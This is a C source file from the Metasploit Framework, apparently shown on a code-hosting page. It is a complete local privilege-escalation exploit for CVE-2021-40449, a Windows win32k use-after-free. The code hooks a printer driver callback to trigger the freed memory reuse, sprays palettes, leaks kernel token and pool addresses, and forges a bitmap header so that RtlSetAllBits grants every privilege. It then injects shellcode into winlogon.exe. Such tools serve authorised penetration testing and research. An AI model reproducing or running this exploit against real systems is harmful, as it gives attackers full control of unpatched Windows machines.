rapid7/metasploit-framework

View on GitHub
external/source/exploits/CVE-2021-40449/CVE-2021-40449/dllmain.c

Summary

Maintainability
Test Coverage
#pragma warning( disable : 4005 )

#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include <stdio.h>
#include <winddi.h>
#include <Windows.h>
#include <psapi.h>
#include <tlhelp32.h>
#include <winspool.h>
#include "../../include/windows/common.h"
#include "../../include/windows/definitions.h"

// Manually define a whole bunch of structures with definitions from winternl.h vs importing winternl.h cause our ReflectiveLoader.h 
// decided it would be a bright idea to define only some of these manually, thus causing any other program that wants to load anything 
// that this defines to cause compilation errors, even if its trying to override the definition with more correct info or more definitions.

typedef struct _DriverHook
{
    ULONG index;
    LPVOID func;
} DriverHook;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING* PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;

typedef struct
{
    DWORD64 Address;
    DWORD64 PoolSize;
    CHAR PoolTag[4];
    CHAR Padding[4];
} BIG_POOL_INFO, * PBIG_POOL_INFO;

typedef BOOL(*DrvEnableDriver_t)(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);
typedef DHPDEV(*DrvEnablePDEV_t)(DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver);
typedef VOID(*VoidFunc_t)();
typedef NTSTATUS(*NtSetInformationThread_t)(HANDLE threadHandle, THREADINFOCLASS threadInformationClass, PVOID threadInformation, ULONG threadInformationLength);
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

DHPDEV hook_DrvEnablePDEV(DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver);

DriverHook driverHooks[] = {
    {INDEX_DrvEnablePDEV, (LPVOID)hook_DrvEnablePDEV},
};

NtSetInformationThread_t SetInformationThread;
NtQuerySystemInformation_t QuerySystemInformation;

//Global Variables
LPWSTR printerName;
HDC hdc;
DWORD counter;
BOOL shouldTrigger;
VoidFunc_t origDrvFuncs[INDEX_LAST];
DWORD64 rtlSetAllBits;
DWORD64 fakeRtlBitMapAddr;
DWORD currentProcessId;

VOID SprayPalettes(DWORD size)
{
    /* Spray palettes to reclaim freed memory */

    DWORD palCount = (size - 0x90) / 4;
    DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY);
    LOGPALETTE* lPalette = (LOGPALETTE*)malloc(palSize);

    if (lPalette == NULL) {
        dprintf("[-] Failed to create palette");
        return;
    }

    DWORD64* p = (DWORD64*)((DWORD64)lPalette + 4);

    // Will call: RtlSetAllBits(BitMapHeader), where BitMapHeader is a forged
    // to point to the current process token (See `CreateForgedBitMapHeader`)
    // This will enable all privileges

    // Offset is specific to each version. Spray the two pointers
    // Arg1 (BitMapHeader)
    for (DWORD i = 0; i < 0x120; i++) {
        p[i] = fakeRtlBitMapAddr;
        // p[0xe5] = fakeRtlBitMapAddr;
    }

    // Function pointer (RtlSetAllBits)
    for (DWORD i = 0x120; i < (palSize - 4) / 8; i++) {
        p[i] = rtlSetAllBits;
        // p[0x15b] = rtlSetAllBits;
    }


    lPalette->palNumEntries = (WORD)palCount;
    lPalette->palVersion = 0x300;

    // Create lots of palettes
    for (DWORD i = 0; i < 0x5000; i++)
    {
        CreatePalette(lPalette);
    }
}

DHPDEV hook_DrvEnablePDEV(DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver)
{
    dprintf("[*] Hooked DrvEnablePDEV called");

    DHPDEV res = ((DrvEnablePDEV_t)origDrvFuncs[INDEX_DrvEnablePDEV])(pdm, pwszLogAddress, cPat, phsurfPatterns, cjCaps, pdevcaps, cjDevInfo, pdi, hdev, pwszDeviceName, hDriver);

    // Check if we should trigger the vulnerability
    if (shouldTrigger == TRUE)
    {
        // We only want to trigger the vulnerability once
        shouldTrigger = FALSE;

        // Trigger vulnerability with second ResetDC. This will destroy the original
        // device context, while we're still inside of the first ResetDC. This will
        // result in a UAF
        dprintf("[*] Triggering UAF with second ResetDC");
        HDC tmp_hdc = ResetDCW(hdc, NULL);
        dprintf("[*] Returned from second ResetDC");

        // This is where we reclaim the freed memory and overwrite the function pointer
        // and argument. We will use palettes to reclaim the freed memory

        dprintf("[*] Spraying palettes");

        SprayPalettes(0xe20);

        dprintf("[*] Done spraying palettes");
    }

    return res;
}

BOOL SetupUsermodeCallbackHook()
{
    /* Find and hook a printer's usermode callbacks */

    DrvEnableDriver_t DrvEnableDriver;
    VoidFunc_t DrvDisableDriver;
    DWORD pcbNeeded, pcbReturned, lpflOldProtect, _lpflOldProtect;
    PRINTER_INFO_4W* pPrinterEnum, * printerInfo;
    HANDLE hPrinter;
    DRIVER_INFO_2W* driverInfo;
    HMODULE hModule;
    DRVENABLEDATA drvEnableData;
    BOOL res;

    // Find available printers
    EnumPrintersW(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &pcbNeeded, &pcbReturned);

    if (pcbNeeded <= 0)
    {
        dprintf("[-] Failed to find any available printers");
        return FALSE;
    }

    pPrinterEnum = (PRINTER_INFO_4W*)malloc(pcbNeeded);

    if (pPrinterEnum == NULL)
    {
        dprintf("[-] Failed to allocate buffer for pPrinterEnum");
        return FALSE;
    }

    res = EnumPrintersW(PRINTER_ENUM_LOCAL, NULL, 4, (LPBYTE)pPrinterEnum, pcbNeeded, &pcbNeeded, &pcbReturned);

    if (res == FALSE || pcbReturned <= 0)
    {
        dprintf("[-] Failed to enumerate printers");
        return FALSE;
    }

    // Loop over printers
    for (DWORD i = 0; i < pcbReturned; i++)
    {
        printerInfo = &pPrinterEnum[0];

        dprintf("[*] Using printer: %ws\n", printerInfo->pPrinterName);

        // Open printer
        res = OpenPrinterW(printerInfo->pPrinterName, &hPrinter, NULL);
        if (!res)
        {
            dprintf("[-] Failed to open printer");
            continue;
        }

        dprintf("[+] Opened printer: %ws\n", printerInfo->pPrinterName);
        printerName = _wcsdup(printerInfo->pPrinterName);

        // Get the printer driver
        GetPrinterDriverW(hPrinter, NULL, 2, NULL, 0, &pcbNeeded);

        driverInfo = (DRIVER_INFO_2W*)malloc(pcbNeeded);

        res = GetPrinterDriverW(hPrinter, NULL, 2, (LPBYTE)driverInfo, pcbNeeded, &pcbNeeded);

        if (res == FALSE)
        {
            //printf("[-] Failed to get printer driver\n");
            continue;
        }

        dprintf("[*] Driver DLL: %ws\n", driverInfo->pDriverPath);

        // Load the printer driver into memory
        hModule = LoadLibraryExW(driverInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);

        if (hModule == NULL)
        {
            dprintf("[-] Failed to load printer driver\n");
            continue;
        }

        // Get printer driver's DrvEnableDriver and DrvDisableDriver
        DrvEnableDriver = (DrvEnableDriver_t)GetProcAddress(hModule, "DrvEnableDriver");
        DrvDisableDriver = (VoidFunc_t)GetProcAddress(hModule, "DrvDisableDriver");

        if (DrvEnableDriver == NULL || DrvDisableDriver == NULL)
        {
            dprintf("[-] Failed to get exported functions from driver\n");
            continue;
        }

        // Call DrvEnableDriver to get the printer driver's usermode callback table
        res = DrvEnableDriver(DDI_DRIVER_VERSION_NT4, sizeof(DRVENABLEDATA), &drvEnableData);

        if (res == FALSE)
        {
            dprintf("[-] Failed to enable driver\n");
            continue;
        }

        dprintf("[+] Enabled printer driver");

        // Unprotect the driver's usermode callback table, such that we can overwrite entries
        res = VirtualProtect(drvEnableData.pdrvfn, drvEnableData.c * sizeof(PFN), PAGE_READWRITE, &lpflOldProtect);

        if (res == FALSE)
        {
            dprintf("[-] Failed to unprotect printer driver's usermode callback table");
            continue;
        }

        // Loop over hooks
        for (DWORD i = 0; i < sizeof(driverHooks) / sizeof(DriverHook); i++)
        {
            // Loop over driver's usermode callback table
            for (DWORD n = 0; n < drvEnableData.c; n++)
            {
                ULONG iFunc = drvEnableData.pdrvfn[n].iFunc;

                // Check if hook INDEX matches entry INDEX
                if (driverHooks[i].index == iFunc)
                {
                    // Saved original function pointer
                    origDrvFuncs[iFunc] = (VoidFunc_t)drvEnableData.pdrvfn[n].pfn;
                    // Overwrite function pointer with hook function pointer
                    drvEnableData.pdrvfn[n].pfn = (PFN)driverHooks[i].func;
                    break;
                }
            }
        }

        // Disable driver
        DrvDisableDriver();

        // Restore protections for driver's usermode callback table
        VirtualProtect(drvEnableData.pdrvfn, drvEnableData.c * sizeof(PFN), lpflOldProtect, &_lpflOldProtect);

        return TRUE;
    }

    return FALSE;
}

DWORD64 GetKernelBase()
{
    /* Get kernel base address of ntoskrnl.exe */

    DWORD lpcbNeeded;
    BOOL res;
    DWORD64* deviceDrivers;
    DWORD64 kernelBase;

    // Get device drivers will return an array of pointers
    // Requires at least medium integrity level
    res = EnumDeviceDrivers(NULL, 0, &lpcbNeeded);

    deviceDrivers = (DWORD64*)malloc(lpcbNeeded);

    res = EnumDeviceDrivers((LPVOID*)deviceDrivers, lpcbNeeded, &lpcbNeeded);

    if (res == FALSE) {
        return 0;
    }

    // First entry matches ntoskrnl.exe
    kernelBase = deviceDrivers[0];

    free(deviceDrivers);

    return kernelBase;
}

DWORD64 GetKernelPointer(HANDLE handle, DWORD type)
{
    /* Get kernel address for handle */

    PSYSTEM_HANDLE_INFORMATION buffer;
    DWORD objTypeNumber, bufferSize;
    DWORD64 object;

    buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(0x20);
    bufferSize = 0x20;

    // Query handle information. This will query information for all handles on the system
    // Requires at least medium integrity level
    NTSTATUS status = QuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, bufferSize, &bufferSize);

    if (status == (NTSTATUS)0xC0000004L)
    {
        // Buffer too small. This is always the case, since we only alloc room 0x20 bytes
        // initially, but we're receiving information for all handles on the system.
        // But if we don't allocate a buffer initially, it will fail for some reason.
        free(buffer);
        buffer = (PSYSTEM_HANDLE_INFORMATION)malloc(bufferSize);
        status = QuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, bufferSize, &bufferSize);
    }

    if (buffer == NULL || status != 0)
    {
        return 0;
    }

    // Loop over the handles
    for (size_t i = 0; i < buffer->NumberOfHandles; i++)
    {
        objTypeNumber = buffer->Handles[i].ObjectTypeIndex;

        // Check if process ID matches current process ID and if object type matches the provided object type
        if (buffer->Handles[i].UniqueProcessId == currentProcessId && buffer->Handles[i].ObjectTypeIndex == type)
        {
            // Check if handle value matches
            if (handle == (HANDLE)buffer->Handles[i].HandleValue)
            {
                // Match. The kernel address will be in `Object`
                object = (DWORD64)buffer->Handles[i].Object;
                free(buffer);
                return object;
            }
        }
    }

    dprintf("[-] Could not find handle");
    free(buffer);

    return 0;
}

DWORD64 GetProcessTokenAddress() {
    /* Get kernel address of current process token */

    HANDLE proc, token;
    DWORD64 tokenKernelAddress;

    // Get handle for current process
    proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, currentProcessId);
    if (proc == NULL) {
        dprintf("[-] Failed to open current process");
        return 0;
    }

    // Get handle for current process token
    if (OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token) == FALSE)
    {
        dprintf("[-] Failed to open process token");
        return 0;
    }

    // Get kernel address for current process token handle
    for (DWORD i = 0; i < 0x100; i++) {
        // Sometimes GetKernelPointer will fail for some reason
        // Mostly only on the the iteration

        tokenKernelAddress = GetKernelPointer(token, 0x5);

        if (tokenKernelAddress != 0) {
            break;
        }
    }

    if (tokenKernelAddress == 0) {
        dprintf("[-] Failed to get token kernel address");
        return 0;
    }

    return tokenKernelAddress;
}

DWORD64 CreateForgedBitMapHeader(DWORD64 token)
{
    /* Create a forged BitMapHeader on the large pool to be used in RtlSetAllBits */

    // Cool trick taken from:
    // https://github.com/KaLendsi/CVE-2021-40449-Exploit/blob/main/CVE-2021-40449-x64.cpp#L448
    // https://gist.github.com/hugsy/d89c6ee771a4decfdf4f088998d60d19

    DWORD dwBufSize, dwOutSize, dwThreadID, dwExpectedSize;
    HANDLE hThread;
    USHORT dwSize;
    LPVOID lpMessageToStore, pBuffer;
    UNICODE_STRING target;
    HRESULT hRes;
    ULONG_PTR StartAddress, EndAddress, ptr;
    PBIG_POOL_INFO info;

    hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)NULL, 0, CREATE_SUSPENDED, &dwThreadID);

    dwSize = 0x1000;

    lpMessageToStore = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_READWRITE);

    memset(lpMessageToStore, 0x41, 0x20);

    // BitMapHeader->SizeOfBitMap
    *(DWORD64*)lpMessageToStore = 0x80;

    // BitMapHeader->Buffer
    *(DWORD64*)((DWORD64)lpMessageToStore + 8) = token;

    target.Length = dwSize;
    target.MaximumLength = 0xffff;
    target.Buffer = (PWSTR)lpMessageToStore;

    hRes = SetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &target, 0x10);

    dwBufSize = 1024 * 1024;
    pBuffer = LocalAlloc(LPTR, dwBufSize);

    hRes = QuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, pBuffer, dwBufSize, &dwOutSize);

    dwExpectedSize = target.Length + sizeof(UNICODE_STRING);

    StartAddress = (ULONG_PTR)pBuffer;
    EndAddress = StartAddress + 8 + *((PDWORD)StartAddress) * sizeof(BIG_POOL_INFO);
    ptr = StartAddress + 8;
    while (ptr < EndAddress)
    {
        info = (PBIG_POOL_INFO)ptr;

        if (strncmp(info->PoolTag, "ThNm", 4) == 0 && dwExpectedSize == info->PoolSize)
        {
            return (((ULONG_PTR)info->Address) & 0xfffffffffffffff0) + sizeof(UNICODE_STRING);
        }
        ptr += sizeof(BIG_POOL_INFO);
    }

    dprintf("[-] Failed to leak pool address for forged BitMapHeader\n");

    return 0;
}

BOOL Setup() {
    DWORD64 kernelBase, tokenKernelAddress, rtlSetAllBitsOffset;
    HMODULE kernelModule, ntdllModule;

    ntdllModule = LoadLibraryW(L"ntdll.dll");

    if (ntdllModule == NULL) {
        dprintf("[-] Failed to load NTDLL");
        return FALSE;
    }

    currentProcessId = GetCurrentProcessId();

    SetInformationThread = (NtSetInformationThread_t)GetProcAddress(ntdllModule, "NtSetInformationThread");
    QuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(ntdllModule, "NtQuerySystemInformation");

    kernelBase = GetKernelBase();
    if (kernelBase == 0) {
        dprintf("[-] Failed to get kernel base");
        return FALSE;
    }

    kernelModule = LoadLibraryExW(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (kernelModule == 0) {
        dprintf("[-] Failed to load kernel module");
        return FALSE;
    }

    tokenKernelAddress = GetProcessTokenAddress();

    if (tokenKernelAddress == 0) {
        dprintf("[-] Failed to get token kernel address");
        return FALSE;
    }

    rtlSetAllBitsOffset = (DWORD64)GetProcAddress(kernelModule, "RtlSetAllBits");
    if (rtlSetAllBitsOffset == 0) {
        dprintf("[-] Failed to find RtlSetAllBits");
        return FALSE;
    }

    rtlSetAllBits = (DWORD64)kernelBase + rtlSetAllBitsOffset - (DWORD64)kernelModule;

    fakeRtlBitMapAddr = CreateForgedBitMapHeader(tokenKernelAddress + 0x40);
    if (fakeRtlBitMapAddr == 0) {
        dprintf("[-] Failed to pool leak address of token");
        return FALSE;
    }

    return SetupUsermodeCallbackHook();
}

VOID InjectToWinlogon(PMSF_PAYLOAD msfPayload)
{
    /* Inject shellcode into winlogon.exe */

    PROCESSENTRY32 entry;
    HANDLE snapshot, proc;

    entry.dwSize = sizeof(PROCESSENTRY32);

    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    INT pid = -1;
    if (Process32First(snapshot, &entry))
    {
        while (Process32Next(snapshot, &entry))
        {
            if (strcmp(entry.szExeFile, "winlogon.exe") == 0)
            {
                pid = entry.th32ProcessID;
                break;
            }
        }
    }

    CloseHandle(snapshot);

    if (pid < 0)
    {
        dprintf("[-] Could not find winlogon.exe");
        return;
    }

    proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (proc == NULL)
    {
        dprintf("[-] Failed to open process. Exploit did probably not work");
        return;
    }

    LPVOID buffer = VirtualAllocEx(proc, NULL, msfPayload->dwSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if (buffer == NULL)
    {
        dprintf("[-] Failed to allocate remote memory");
        return;
    }

    if (!WriteProcessMemory(proc, buffer, &msfPayload->cPayloadData, msfPayload->dwSize, 0))
    {
        dprintf("[-] Failed to write to remote memory");
        return;
    }

    HANDLE hthread = CreateRemoteThread(proc, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);

    if (hthread == INVALID_HANDLE_VALUE)
    {
        dprintf("[-] Failed to create remote thread");
        return;
    }
}

INT exploit(PMSF_PAYLOAD msfPayload)
{
    BOOL res = FALSE;

    res = Setup();

    if (res == FALSE) {
        dprintf("[-] Failed to setup exploit");
        return 0;
    }


    // Create new device context for printer with driver's hooked callbacks
    hdc = CreateDCW(NULL, printerName, NULL, NULL);
    if (hdc == NULL)
    {
        dprintf("[-] Failed to create device context");
        return -1;
    }

    // Trigger the vulnerability
    // This will internally call `hdcOpenDCW` which will call our usermode callback
    // From here we will call ResetDC again to trigger the UAF
    shouldTrigger = TRUE;
    ResetDC(hdc, NULL);

    // Exploit complete
    // We should now have all privileges

    dprintf("[*] Spawning remote thread");

    InjectToWinlogon(msfPayload);

    return 0;
}

LPVOID main(PMSF_PAYLOAD msfPayload) {
    exploit(msfPayload);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason) 
    {
    case DLL_QUERY_HMODULE:
        hAppInstance = hinstDLL;
        if (lpReserved != NULL)
        {
            *(HMODULE*)lpReserved = hAppInstance;
        }
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hinstDLL;
        main((PMSF_PAYLOAD)lpReserved);
        break;
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}